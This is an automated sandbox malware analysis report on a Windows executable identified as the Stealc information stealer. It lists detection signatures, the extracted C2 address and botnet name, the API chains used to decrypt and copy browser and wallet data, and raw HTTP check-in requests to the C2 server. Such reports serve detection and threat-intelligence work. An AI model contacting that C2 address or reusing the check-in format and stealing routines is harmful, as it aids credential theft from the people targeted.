Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561643
MD5: 3feea8ff886f1fc0d57da4a2b3a109ba
SHA1: 78d6302f4f09726b6a129c5fcc7cd94a474cc53a
SHA256: 143e6525646d5d95639eb77420a54205cb02fb8624c6e1662b7460f58b03523f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3FEEA8FF886F1FC0D57DA4A2B3A109BA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7148 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7148 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T03:04:07.818374+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpy; | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/i | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/G | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/5zm$ | Avira URL Cloud: Label: malware
Source: file.exe.7148.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: http://185.215.113.206/c4becf79229cb002.php/G | Virustotal: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00444C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_00444C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_004460D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_004640B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00456960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_00456960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat | 0_2_0044EA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00456B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_00456B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00449B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00449B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00449B80 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00449B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00447750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00447750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_004518A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00453910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00453910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00451250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00451250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00451269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00451269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_0045E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00454B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00454B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00454B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00454B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_0045CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0044DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00452390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 0_2_00452390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0044DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_004523A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 0_2_0045DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_0045D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_004416A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_004416B9

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 41 37 32 43 37 45 41 45 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a
    Data Ascii:
    ------CBAKJKJJJECFIEBFHIEG
    Content-Disposition: form-data; name="hwid"

    E1A72C7EAE193468552849
    ------CBAKJKJJJECFIEBFHIEG
    Content-Disposition: form-data; name="build"

    mars
    ------CBAKJKJJJECFIEBFHIEG--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00446C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy | 0_2_00446C40
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw and Data Ascii: identical to the POST request listed under "global traffic" above (same hwid and build fields).
Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/5zm$
Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/G
Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/i
Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy;
Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206k
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00449770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop | 0_2_00449770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF076 | 0_2_007FF076
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FC8C4 | 0_2_007FC8C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004648B0 | 0_2_004648B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008311CE | 0_2_008311CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080D295 | 0_2_0080D295
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00779A31 | 0_2_00779A31
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00804ACF | 0_2_00804ACF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FB2F4 | 0_2_007FB2F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CA2E8 | 0_2_007CA2E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF30F | 0_2_007FF30F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FFC67 | 0_2_007FFC67
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007754CB | 0_2_007754CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EF4B6 | 0_2_007EF4B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6496 | 0_2_007F6496
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069C5BF | 0_2_0069C5BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008066C3 | 0_2_008066C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F7622 | 0_2_007F7622
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091F6FF | 0_2_0091F6FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00801664 | 0_2_00801664
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074BF84 | 0_2_0074BF84
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00444A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: cdtaybca ZLIB complexity 0.9947091291603631
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00463A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00463A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_0045CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AU3S3VHT.htm
